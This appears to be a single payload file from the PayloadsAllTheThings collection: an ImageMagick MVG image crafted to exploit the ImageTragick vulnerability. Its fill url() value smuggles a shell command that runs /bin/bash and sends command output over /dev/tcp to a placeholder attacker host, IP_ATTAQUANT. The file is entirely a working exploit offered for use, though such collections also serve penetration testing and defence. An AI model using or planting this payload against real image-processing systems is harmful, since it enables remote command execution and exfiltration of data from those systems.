PayloadsAllTheThings/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg
2019-02-15 16:00:50 +01:00

5 lines
140 B
Plaintext

push graphic-context
viewbox 0 0 640 480
fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
pop graphic-context